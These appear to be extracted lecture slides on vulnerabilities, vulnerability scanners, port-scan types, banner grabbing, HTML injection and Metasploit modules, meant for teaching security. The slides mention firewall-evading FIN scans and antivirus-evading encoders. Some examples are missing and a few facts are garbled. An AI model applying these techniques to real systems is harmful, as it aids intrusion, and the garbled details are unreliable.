Vulnerability

Vulnerability
• A computer vulnerability is a cyber security term that refers to a defect in a
system that can leave it open to attack.
• It is also refer to any type of weakness present in a computer itself, in a set
of procedures, or in anything that allows information security to be exposed
to a threat.
 Common Computer Security
Vulnerabilities
• Bugs • Use of broken algorithms
• Weak passwords • URL redirection to untrusted sites
• Software that is already infected with virus • Path traversal
• Missing data encryption • Missing authentication for critical function
• OS command injection • Unrestricted upload of dangerous file types
• SQL injection • Dependence on untrusted inputs in a
security decision
• Buffer overflow
• Missing authorization
• Cross-site scripting and forgery
• Download of codes without integrity checks
 System securities which can be harmed with
computer security vulnerability
• Reliability
• Confidentiality
• Entirety
• Usability
• Undeniableness:
 System securities which can be harmed with
computer security vulnerability
• Reliability: This refers to reducing incorrect false alarm in the operation of a computer system
and enhancing the efficiency of a computer system.
• Confidentiality: This refers to protecting users’ information from disclosure and getting by
unauthorized third party.
• Entirety: This system security requires that information or programs should not be forged,
tampered, deleted or inserted deliberately in the process of storing, operation and
communication. In other words, information or programs cannot be lost or destroyed.
• Usability: This ensures that users can enjoy the services offered by computers and information
networks.
• Undeniableness: This security refers to guaranteeing information actors to be responsible for
their behavior.
 Security Definitions
Vulnerability
A deficiency, error, or misconfiguration within a system which can be exploited
allowing the system to be used in an unintended manner.

Vulnerabili ty Scanner
Automatically tests system for KNOWN vulnerabilities
to confirm presence.

Exploit
Software program developed to attack an asset by taking advantage of a
vulnerability.
 WHAT IS A VULNERABILITY
SCANNER?
• A vulnerability scanner can assess a variety of vulnerabilities across
information systems (including computers, network systems, operating
systems, and software applications) that may have originated from a vendor,
system administration activities, or general day-to-day user activities
 Vendor-originated activities

• This includes software bugs, missing operating system patches, vulnerable

services, insecure default configurations, and web application vulnerabilities.
System administration-originated activities

• This includes incorrect or unauthorized system configuration changes, lack

of password protection policies, and so on.
 User-originated activities
• This includes sharing directories to unauthorized parties, failure to run virus
scanning software, and malicious activities, such as deliberately introducing
system backdoors.
 BENEFITS OF VULERABILITY
SCANNERS
1. A vulnerability scanner allows early detection and handling of known
security problems.
2. A new device or even a new system may be connected to the network
without authorization. A vulnerability scanner can help identify rogue
machines, which might endanger overall system and network security.
3. A vulnerability scanner helps to verify the inventory of all devices on the
network.
 LIMITATIONS OF VULERABILITY
SCANNERS

1. Snapshot only: a vulnerability scanner can only assess a "snapshot of time" in

terms of a system or network's security status.
2. Human judgement is needed: Vulnerability scanners can only report vulnerabilities
according to the plug-ins installed in the scan database. They cannot determine
whether the response is a false negative or a false positive.
3. Others: a vulnerability scanner is designed to discover known vulnerabilities only.
It cannot identify other security threats, such as those related to physical,
operational or procedural issues.
ARCHITECTURE OF VULNERABILITY
SCANNERS
ARCHITECTURE OF VULNERABILITY
SCANNERS

• The Scan Engine executes security checks according to its

installed plug-ins, identifying system information and
vulnerabilities.

• The Scan Database stores vulnerability information, scan

results, and other data used by scanner.
• The Report Module provides different levels of reports on the scan results,
such as detailed technical reports with suggested remedies for system
administrators, summary reports for security managers, and high-level graph
and trend reports for executives.

• The User Interface allows the administrator to operate the scanner. It may be
either a Graphical User Interface (GUI), or just a command line interface.
 TYPES OF VULNERABILITY
SCANNER
• Vulnerability scanners can be divided broadly into two groups:

1. Network-based scanners that run over the network

2. Host-based scanners that run on the target host itself.
 NETWORK-BASED SCANNERS
• A network-based scanner is usually installed on a single machine that scans a
number of other hosts on the network.
• It helps detect critical vulnerabilities such as mis-configured firewalls,
vulnerable web servers, risks associated with vendor-supplied software, and
risks associated with network and systems administration.
Different types of network-based scanners

1. Port Scanners that determine the list of open network ports in remote
systems.
2. Web Server Scanners that assess the possible vulnerabilities (e.g.
potentially dangerous files or CGIs) in remote web servers.
3. Web Application Scanners that assess the security aspects of web
applications (such as cross site scripting and SQL injection) running on
web servers.
 HOST-BASED SCANNERS
• A host-based scanner is installed in the host to be scanned, and has direct
access to low-level data, such as specific services and configuration details of
the host's operating system.
• It can therefore provide insight into risky user activities such as using easily
guessed passwords or even no password.
• It can also detect signs that an attacker has already compromised a system,
including looking for suspicious file names, unexpected new system files or
device files, and unexpected privileged programs.
 TYPES OF VULNERABILITY
SCANNER
1. Network-based scanners
a) Port scanners
(Nmap : http://insecure.org/nmap)
b) Network vulnerability scanners
(Nessus http://www.nessus.org/nessus/)
c) Web server scanners
(Nikto : http://www.cirt.net/code/nikto.html)
d) Web application vulnerability scanners (Paros :-
http://parosproxy.org/index.html)
(Acunetix :-http://www.acunetix.com/Acunetix)
2. Host-based scanners
Host vulnerability scanners
- Microsoft Baseline Security Analyser (MBSA)
(http://www.microsoft.com/technet/security/tools/mbsahome)
- Altiris SecurityExpressions (commercial) :
(http://www.altiris.com/Products/SecurityExpressions.aspx)
3. Database scanners
- Scuba by Imperva Database Vulnerability Scanner:
(http://www.imperva.com/application_defense_center/scuba/default.a
sp)
- Shadow Database Scanner
(http://www.safety-lab.com/en/products/6.html)
→ CHOOSING A VULNERABILITY
SCANNER

1. Updating Frequency and Method of Plug-in Updates

2. Quality versus Quantity of Vulnerabilities Detected
3. Quality of Scanning Reports
 Open port / Service
Identification
A port scanner is a program that is used in network security testing
and troubleshooting.
An online port scanner, is a scan that is able to externally test your
network firewall and open ports ,because it is sourced from an
external IP address.
It is powered by a simple port scanner program that is hosted on
another system usually with an easy to use web interface.
 Open port / Service Identification

A network is compromised of systems with addresses and on those

systems you have services.
The address is called an “IP Address” and the Service could be
many things but is basically software that is running on the system
and accessible over the network on a port number. It could be a web
server, email server or gaming server.
 Open port / Service Identification

An IP Address looks like this: 192.168.1.3

services will run on 192.168.1.3 and listen on a port. Example Ports;
web server : port 80
mail server (smtp) : port 25
mail server post office protocol (pop3) : port 110
game server : port 49001
 Common Ports
25 Email (SMTP)
53 Domain Name Server(name corresponding to IP address)
80 Web Server (HTTP)
110 Email Server (POP3)
143 Email Server (IMAP)
443 Web Server (HTTPS)
445 Windows Communication Protocol (File Sharing etc)
8080 Proxy Server(acts like a server)
 Scan result
• In TCP/IP network services are referenced using host address and port
number.
• Eg: 192.168.1.1:22
• Result of the scan in a port is characterized into 3 categories:
• Open or Accepted
• Closed or denied or not listening
• Filtered, dropped or blocked.
 Port threats
• Open port presents two vulnerabilities:
• Security and stability concerns associated with the program responsible for delivering
the service – Open ports
• Security and stability concerns associated with the operating system that is running on
the host – Open or Closed ports

Filtered ports do not tend to present vulnerabilities.

 Port scanning types
• TCP Scanning
• SYN Scanning
• UDP Scanning
• ACK Scanning
• Window Scanning
• FIN Scanning
• Other scan types
 TCP Scanning
• TCP scan completes the TCP three-way handshake and the port scanner
closes the connection to avoid performing a Denial –of-service attack.
Otherwise an error code is returned
• The services can log the sender IP address and Intrusion Detection
System(IDS) can raise an alarm.
• Nmap calls this mode connect scan, named after the Unix connect() syatem
call.
 SYN Scanning
SYN scan is another form of TCP Scanning, also known as half-open scanning.
• The port scanner generates a SYN packet. If the target port is open, it will
respond with a SYN-ACK packet. The scanner host responds with an RST
packet, closing the connection before the handshake is completed.
• If the port is closed but unfiltered, the target will instantly respond with an
RST packet.
 UDP Scanning
• UDP port scanners send a UDP packet to a port and if that port is not
open, the system will respond with an ICMP port unreachable message.
• The absence of a response is considered that port is open.
• If a port is blocked by a firewall, this method will falsely report that the port
is open.
 ACK Scanning
• ACK scanning does not exactly determine whether the port is open or
closed, but whether the port is filtered or unfiltered.
• This is especially good when attempting to probe for the existence of a
firewall and its rulesets.
 Window Scanning
• Window Scanning is rarely used and is untrustworthy in determining whether
a port is opened or closed.
• It generates the same packet an as ACK scan, but checks whether the
window field of the packet has been modified.
 FIN Scanning
• Firewall block generally SYN packets.
• FIN packets can bypass firewals without modification.
• Closed ports reply to a FIN packet with the appropriate RST packet, whereas
open ports ignore the packet on hand.
 Open port / Service Identification

The Nmap port scanner is the worlds leading

port scanner.
It is very accurate, stable and has more options
than just port scanning. It can be used for
vulnerability tests too..
 TRAFFIC PROBE

1) High-Speed Traffic Processing

2) Network Traffic Measurement
3) Network Intrusion Detection
 High-Speed Traffic Processing
•LAN and MAN have evolved over a considerable time span (the last 30 years)
and encompass wired and wireless physical links and speeds from 1 Mb/s to 100
Gb/s.
•According to DAG project (Wakaito) :- The total amount of data created or
replicated on the planet in 2010 was over 1 zettabyte (1 zettabyte is 1021
bytes) - that’s 143 GB for each of the 7 billion people on the planet.
This volume of information requires high-speed links between server farms, cloud storage, and
end users to make sure that it can be processed in a timely and reliable fashion.” It will not be
possible to analyse such huge traffic volumes in the coming 100 GbE network installations with
the current generation of network measurement tools.
FPGA cards (intel 82599, Myri-10G Lanai Z8ES) are still used in applications which perform
in-depth analysis, patter matching, and low- latency operations, and in 40/100 Gb/s networks.
 Network Traffic Measurement

1) Full packet traces.

2)Flow statistics provide information from
Internet Protocol (IP).
3)Volume statistics are provided by most
network appliances for network
management.
 Network Intrusion Detection

• The signature-based approach inspects

the evaluated content.
• Anomaly-based detection.
• Stateful protocol analysis.
 VERSION CHECK

1) -sV (Version detection)

2)-allports (Don't exclude any ports from version
detection)
3)-version-intensity <intensity> (Set version scan
intensity)
4) -version-all (Try every single probe)
5)- version-trace (Trace version scan activity)
 Banner Grabbing

A Banner is like a text message received from the host.

It contains information about the services running on the host along
with information about the ports.
 Banner Grabbing

Banner Grabbing is a technique used to obtain information about

a computer system on a network and the services running on its
open ports.
This technique is generally used by the System administrators to
scan the network to check what all services are running etc.
 Banner Grabbing

After scanning and connecting to an open port , most services on a

host announces sensitive information without much effort from the
client.
This info can be used to penetrate the host's security.
 eg. of a banner

$ nc -v localhost 22
connection to localhost 22 port [tcp/ssh] succeeded!
SSH -2.0-OpenSSH_5.9
Netcat is a computer networking utility for reading from or writing to a nework
22 is the communication port.
 Banner Grabbing

Common practice followed by the adminstrators is to

make some alteration to the banners to hide sensitive
data.
It makes the attacker feel that the results are unrelaible.
The common trade off is that , altering the banners
make it difficult for the native scanner.
 Port Scanning
• The process of examining a range of IP addresses to determine what services
are running on a network.
• Finds open ports on a computer and the services running on it. For example
o HTTP uses port 80 to connect to a Web service Eg: IIS / Apache

• Port-scanning tools can be complex, must learn their strengths and weaknesses a
nd understanding how and when you should use these tools.
• a web service will not respond until it receives data from
the client.
• The following command makes a valid HTTP request
using the HEAD method:
Request message from client to server
head method used to ask only for an information about a document
HTTP/1.1 200 OK,means the server is responding using HTTP protocol
version 1.1 200 when everything is okay
An entity tag (ETag) is an HTTP header used for Web cache validation
and conditional requests from browsers for resources.
The web site indicates Apache/2.2.11 in its Server header.
You could infer from this that the web site is prone to certain denial of
service (DoS) attacks (based on known vulnerabilities in the CVE
(common vulnerabilities and exposures ) database.
Traffic probes try to use valid requests.
For one thing, valid protocol messages are less likely to crash or interrupt a
service—if a web server didn’t handle the HEAD method without crashing, then
it’s a buggy service that needs to be fixed regardless of security problems.
The other reason is that the failure mode for services might not reveal as much
information.
For example, here’s another probe for an HTTP service using an incorrect request
format.
Notice that the informative headers are missing.
benefits of using a tool with a history of development and
research that has enumerated the best ways to get information
about services.
Traffic probes are not perfect.
Most services can be configured to remove version related
information or even spoof this information.
 Vulnerability Probe

Software that tests for potential security breaches(gaps) on the

network
Some security bugs can’t be identified without sending a payload
that exploits a suspected vulnerability.
These types of probes are more accurate—
they rely on direct observation, not based on port numbers or
service banners.
 Vulnerability Probe

carry more risk of interrupting the service

example of a vulnerability probe is an HTML injection check for a web application
Also known as cross site scripting
Allows attacker to inject HTML code into web pages that are viewed by other users
 HTML Injection
• he essence of this type of injection attack is injecting HTML code through
the vulnerable parts of the website.
• The Malicious user sends HTML code through any vulnerable field with a
purpose to change the website’s design or any information, that is displayed
to the user.
• In general, HTML Injection is just the injection of markup language
code to the document of the page.
When a web app reflects user-supplied text , and that text con
tains characters that are important to the syntax of HTML
(such as the angle brackets used to define tags like <script>),
then it’s likely that the app has a vulnerability that would
enable an attacker to actually rewrite portions of the web page.
An attacker who exploits an HTML injection vulnerability like
this could steal data from the user or deface the web site.
A possible attack scenario is demonstrated
below
Attacker discovers injection vulnerability and decides to use an HTML injection
attack
Attacker crafts malicious link, including his injected HTML content, and sends
it to a user via email
The user visits the page due to the page being located within a trusted domain
The attacker‘s injected HTML is rendered and presented to the user asking for a
username and password
The user enters a username and password, which are both sent to the attackers
server
An exploit exercises a vulnerability to produce some advantage to a hacker.
The outcome may be
• to crash the software,
• causing a denial of service,
• or retrieve data, like pulling usernames and passwords from a database,
• or completely compromise the operating system by gaining root or
administrator access.
Discovering a vulnerability means exposing a software flaw.
Developing an exploit means taking advantage of software flaw to give the
attacker an advantage against the system.
 Application Areas
• Network-Problem Determination and Analysis
• Traffic-Report Generation(system report)
• Intrusion & Hacking Attack (e.g., DoS, DDoS)
Detection
• Service Level Monitoring (SLM)(service provider
monitor)
• Network Planning(study and plan)
• Usage-based Billing(helps and serves it)
• Customer Relationship Management (CRM)
• Marketing
 Issues in Traffic Monitoring

Trade-offs
• Network bandwidth
• Processing overhead- (processing time)
• Accuracy
• Cost
 Problems
Capturing Packets
• High-speed networks (Mbps  Gbps  Tbps)
• High-volume traffic
• Streaming media (Windows Media, Real Media, Quicktime,youtu
be- performance related issues )
• P2P traffic(peer to peer , complete analysis reduces performance
, eg:game usage)
• Network Security Attacks
 Problems
 Flow Generation & Storage
• What packet information to save, to perform various analysis?
• How to minimize storage requirements?

 Analysis
• How to analyze and generate data needed quickly?
• What kinds of info needs to be generated?  Depends on applications
 Research & Development Goals
⇢ Develop Methods to
• Capture all packets
• Generate flows
• Store flows efficiently
• Analyze data efficiently
• Generate various reports or information that are suitable for various application areas
⇢ Develop a Flexible, Scalable Traffic Monitoring and Analysis System for
• High-speed
• High-volume
• Rich media IP networks(eg :live video streaming)
 Network Monitoring Metrics
Connectivity
Availability
Functionality

One way loss

Loss
RT loss

Network Monitoring Metrics

One way delay

Delay RT delay

Delay variance

Capacity

Utilization Bandwidth

Throughput
 Network Monitoring Metrics
⇢ Availability
• The percentage of a specified time interval during which the system was available for no
rmal use

• What is supposed to be available?

• Service, Host, Network
• Availabilities are usually reported as a single monthly figure
• 99.99% availability means that the service is unavailable for 4 minutes during a month
• One can test availability by sending suitable packets and observing the answering packet
(latency, packet loss)
• Metrics
• Connectivity: the physical connectivity of network elements
• Functionality: whether the associated system works well or not
 Network Monitoring Metrics
⇢ Packet Loss
• The fraction of packets lost in transit from a host to another during a specified time interval

• Internet packet transport works on a best-effort basis, i.e., a router may drop them depending on its
current conditions

• A moderate level of packet loss is not in itself tolerable

• Some real-time services, e.g., VoIP, can tolerate some packet losses
• TCP resends lost packets at a slower rate

• Metrics
• One way loss
• Round Trip (RT) loss
 Network Monitoring Metrics
⇢ Throughput
• The rate at which data is sent through the network, usually expressed in bytes/sec, packets/sec, or
flows/sec

• Be careful in choosing the interval; a long interval will average out short-term bursts in the data rate
• A good compromise is to use one- to five-minute intervals, and to produce daily, weekly, monthly, and yearly plots

• Link Utilization over a specified interval is simply the throughput for the link expressed as a
percentage of the access rate

• Metrics
• Link Capacity (Mbps, Gbps)
• Throughput (bytes/sec, packets/sec, flows/sec)
• Utilization (%)
Passive Monitoring

Active Monitoring
 Traffic Monitoring Approaches

Active Monitoring
• Performed by sending test (probe) traffic into network
• Generate test packets periodically or on-demand
• Measure performance of test packets or responses
• Take the statistics
• Impose extra traffic on network and distort its behavior in the process
• Test packet can be blocked by firewall or processed at low priority by routers
• Mainly used to monitor network performance
 Traffic Monitoring Approaches

Test packet Test packet

generator probe

Response Target
Probe host
 Traffic Monitoring Approaches

Passive Monitoring
• Carried out by observing network traffic
• Collect packets from a link or network flow from a router
• Perform analysis on captured packets for various purposes
• Network device performance degrades by mirroring or flow export
• Used to perform various traffic usage/characterization analysis or
intrusion detection
 Comparison
Active Monitoring Passive Monitoring
Configuration Multi-point Single or multi-point
Data size Small Large
 Device overhead
Network overhead Additional traffic
 No overhead if splitter is used

Purpose Delay, packet loss, availability Throughput, traffic pattern, trend, & detection

CPU Requirement Low to Moderate High

Gain some benefits at the initial stage of network
Advantages construction, because not much data gained from
passive one
 Measured result may show the real network
characteristics
 Does not need to generate additional probe
messages

 Cannot reflect network characteristics  Captured data has massive volume size
Disadvantages  Need to generate the probe messages which may  Should have additional facility to capture the
cause extra overhead to network mirrored packet from network
OpenVAS (Open Vulnerability Assessment System, the
name of the fork originally known as GNessUs) is a
framework of several services and tools offering a
vulnerability scanning and vulnerability management
solution.
All OpenVAS products are Free Software.
Most components are licensed under theGPL.
In technical terms, the basis of OpenVAS is aservice-
oriented client-server architecture.
 The OpenVAS framework consists of various
modules, each with a clearly defined task. These
communicate via well established protocols.
The communication is consistently SSL-secured.
 Information

 The Open Vulnerability Assessment System (OpenVAS) is the most

widespread Open Source solution for vulnerability scanning and
vulnerability management. It is used and improved world wide by
people ranging from security experts to private users.
The Manager is the central service that consolidates plain
vulnerability scanning into a full vulnerability management
system. It controls one or more Scanners as well as other
Managers when in master-slave mode. Furthermore, the
Manager controls the internal central SQL database where all
scan results and configurations are stored

The Scanner very efficiently executes the actual Network

Vulnerability Tests (NVTs) which are updated daily via the
Feed. This core of the scan engine is controlled by the
OpenVAS Manager.
 The Greenbone Security Assistant is a lean web service
designed with security in mind. It implements the full
functionality offered by OpenVAS Manager.

This module primarily contains the command line tool

"omp". It allows a user to build batch processes to control the
OpenVAS Manger.
 METASPLOIT FRAMEWORK
• Its an open source exploitation framework.
• It is not just a single tool but collection of several.
• Used mostly for Penetration Testing, Research,
Creating and Testing new exploits.
• It provides infrastructure to automate mundane and
complex tasks.
ARCHITECTURE OF
METASPLOIT
 MODULES

Exploits
Payloads
Encoders
Nops
Auxiliary
 #ENCODERS
• Encoders are used to evade the anti- virus Softwares and
firewall
• However it has no effect on the functionality of out exploit
• Popular encoders are –
1. shikata_ga_nai
2. base64
3. powershell_base64
 #NOPs

• NOP is short for No OPeration

• NOPs keep the payload sizes consistent ensuring
that validly executable by the processor.. Basically
makes payload stable
 #AUXILIARY

• Provides additional functionality like scanning,

fuzzing, Information gathering
 #PAYLOADS
 Singles
Usually standalone. Fire and forget type.
 Stagers
Payload is divided into stages.
 Stages
Components of stager module.